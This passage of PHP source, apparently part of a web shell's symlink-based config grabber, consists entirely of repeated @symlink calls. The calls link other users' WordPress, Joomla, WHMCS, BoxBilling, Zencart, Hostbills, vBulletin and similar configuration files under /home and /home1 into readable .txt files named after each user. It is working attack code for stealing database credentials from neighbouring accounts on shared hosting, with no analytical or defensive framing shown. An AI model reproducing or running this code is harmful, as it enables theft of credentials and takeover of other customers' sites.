  1279. @symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1280. @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1281. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1282. @symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1283. @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1284. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1285. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1286. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1287. @symlink('/home/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1288. @symlink('/home/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1289. @symlink('/home/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1290. @symlink('/home/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1291. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1292. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1293. @symlink('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1294. @symlink('/home/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1295. @symlink('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1296. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1297. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1298. @symlink('/home/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1299. @symlink('/home/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1300. @symlink('/home/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1301. @symlink('/home/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1302. @symlink('/home/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1303. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1304. @symlink('/home/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1305. @symlink('/home/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1306. @symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1307. @symlink('/home/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1308. @symlink('/home/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1309. @symlink('/home/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1310. @symlink('/home/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1311. @symlink('/home/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1312. @symlink('/home/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1313. @symlink('/home/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1314. @symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1315. @symlink('/home/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1316. @symlink('/home/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1317. @symlink('/home/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1318. @symlink('/home/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1319. @symlink('/home/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1320. @symlink('/home/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1321. @symlink('/home/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1322. @symlink('/home/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1323. @symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1324. @symlink('/home/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1325. @symlink('/home/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1326. @symlink('/home/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1327. @symlink('/home/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1328. @symlink('/home/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1329. @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1330. @symlink('/home/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1331. @symlink('/home/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1332. @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1333. @symlink('/home/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1334. @symlink('/home/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1335. @symlink('/home/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1336. @symlink('/home/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1337. @symlink('/home/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1338. @symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1339. @symlink('/home/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1340. @symlink('/home/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1341. @symlink('/home/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1342. @symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1343. @symlink('/home/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1344. @symlink('/home/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1345. @symlink('/home/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1346. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1347. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1348. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1349. @symlink('/home/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1350. @symlink('/home/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1351. @symlink('/home/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1352. @symlink('/home/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1353. @symlink('/home/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1354. @symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1355. @symlink('/home/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1356. @symlink('/home/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1357. @symlink('/home/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1358. @symlink('/home/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1359. @symlink('/home/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1360. @symlink('/home/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1361. @symlink('/home/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1362. @symlink('/home/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1363. @symlink('/home/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1364. @symlink('/home/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1365. @symlink('/home/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1366. @symlink('/home/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1367. @symlink('/home/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1368. @symlink('/home/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1369. @symlink('/home/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1370. @symlink('/home/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1371. @symlink('/home/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1372. @symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1373. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1374. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1375. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1376. @symlink('/home/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1377. @symlink('/home/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1378. @symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1379. @symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1380. @symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1381. @symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1382. @symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1383. @symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1384. @symlink('/home/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1385. @symlink('/home/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1386. @symlink('/home/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1387. @symlink('/home/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1388. @symlink('/home/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1389. @symlink('/home/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1390. @symlink('/home/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1391. @symlink('/home/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1392. @symlink('/home/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1393. @symlink('/home/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1394. @symlink('/home/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1395. @symlink('/home/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1396. @symlink('/home/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1397. @symlink('/home/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1398. @symlink('/home/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1399. @symlink('/home/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1400. @symlink('/home/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1401. @symlink('/home/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1402. @symlink('/home/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1403. @symlink('/home/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1404. @symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1405. @symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1406. @symlink('/home/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1407. @symlink('/home/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1408. @symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1409. @symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1410. @symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1411. @symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1412. @symlink('/home/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1413. @symlink('/home/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1414. @symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1415. @symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1416. @symlink('/home/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1417. @symlink('/home/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1418. @symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1419. @symlink('/home/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1420. @symlink('/home/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1421. @symlink('/home/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1422. @symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1423. @symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1424. @symlink('/home/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1425. @symlink('/home/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1426. @symlink('/home/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1427.  
  1428. //Home1
  1429.  
  1430. @symlink('/home1/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1431. @symlink('/home1/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1432. @symlink('/home1/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1433. @symlink('/home1/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1434. @symlink('/home1/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1435. @symlink('/home1/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1436. @symlink('/home1/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1437. @symlink('/home1/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1438. @symlink('/home1/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1439. @symlink('/home1/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1440. @symlink('/home1/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1441. @symlink('/home1/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1442. @symlink('/home1/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1443. @symlink('/home1/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1444. @symlink('/home1/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1445. @symlink('/home1/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1446. @symlink('/home1/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1447. @symlink('/home1/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1448. @symlink('/home1/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1449. @symlink('/home1/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1450. @symlink('/home1/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1451. @symlink('/home1/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1452. @symlink('/home1/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1453. @symlink('/home1/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1454. @symlink('/home1/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1455. @symlink('/home1/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1456. @symlink('/home1/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1457. @symlink('/home1/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1458. @symlink('/home1/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1459. @symlink('/home1/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1460. @symlink('/home1/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1461. @symlink('/home1/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1462. @symlink('/home1/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1463. @symlink('/home1/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1464. @symlink('/home1/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1465. @symlink('/home1/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1466. @symlink('/home1/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1467. @symlink('/home1/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1468. @symlink('/home1/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1469. @symlink('/home1/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1470. @symlink('/home1/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1471. @symlink('/home1/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1472. @symlink('/home1/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1473. @symlink('/home1/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1474. @symlink('/home1/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1475. @symlink('/home1/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1476. @symlink('/home1/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1477. @symlink('/home1/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1478. @symlink('/home1/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1479. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1480. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1481. @symlink('/home1/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1482. @symlink('/home1/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1483. @symlink('/home1/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1484. @symlink('/home1/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1485. @symlink('/home1/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1486. @symlink('/home1/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1487. @symlink('/home1/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1488. @symlink('/home1/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1489. @symlink('/home1/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1490. @symlink('/home1/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1491. @symlink('/home1/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1492. @symlink('/home1/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1493. @symlink('/home1/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1494. @symlink('/home1/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1495. @symlink('/home1/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1496. @symlink('/home1/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1497. @symlink('/home1/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1498. @symlink('/home1/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1499. @symlink('/home1/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1500. @symlink('/home1/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1501. @symlink('/home1/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1502. @symlink('/home1/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1503. @symlink('/home1/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1504. @symlink('/home1/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1505. @symlink('/home1/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1506. @symlink('/home1/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1507. @symlink('/home1/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1508. @symlink('/home1/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1509. @symlink('/home1/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1510. @symlink('/home1/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1511. @symlink('/home1/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1512. @symlink('/home1/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1513. @symlink('/home1/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1514. @symlink('/home1/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1515. @symlink('/home1/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1516. @symlink('/home1/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1517. @symlink('/home1/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1518. @symlink('/home1/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1519. @symlink('/home1/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1520. @symlink('/home1/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1521. @symlink('/home1/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1522. @symlink('/home1/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1523. @symlink('/home1/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1524. @symlink('/home1/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1525. @symlink('/home1/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1526. @symlink('/home1/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1527. @symlink('/home1/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1528. @symlink('/home1/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1529. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1530. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1531. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1532. @symlink('/home1/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1533. @symlink('/home1/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1534. @symlink('/home1/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1535. @symlink('/home1/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1536. @symlink('/home1/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1537. @symlink('/home1/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1538. @symlink('/home1/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1539. @symlink('/home1/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1540. @symlink('/home1/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1541. @symlink('/home1/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1542. @symlink('/home1/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1543. @symlink('/home1/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1544. @symlink('/home1/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1545. @symlink('/home1/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1546. @symlink('/home1/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1547. @symlink('/home1/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1548. @symlink('/home1/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1549. @symlink('/home1/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1550. @symlink('/home1/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1551. @symlink('/home1/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1552. @symlink('/home1/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1553. @symlink('/home1/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1554. @symlink('/home1/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1555. @symlink('/home1/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1556. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1557. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1558. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1559. @symlink('/home1/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1560. @symlink('/home1/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1561. @symlink('/home1/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1562. @symlink('/home1/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1563. @symlink('/home1/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1564. @symlink('/home1/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1565. @symlink('/home1/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1566. @symlink('/home1/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1567. @symlink('/home1/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1568. @symlink('/home1/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1569. @symlink('/home1/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1570. @symlink('/home1/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1571. @symlink('/home1/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1572. @symlink('/home1/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1573. @symlink('/home1/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1574. @symlink('/home1/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1575. @symlink('/home1/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1576. @symlink('/home1/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1577. @symlink('/home1/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1578. @symlink('/home1/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1579. @symlink('/home1/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1580. @symlink('/home1/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1581. @symlink('/home1/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1582. @symlink('/home1/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1583. @symlink('/home1/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1584. @symlink('/home1/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1585. @symlink('/home1/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1586. @symlink('/home1/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1587. @symlink('/home1/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
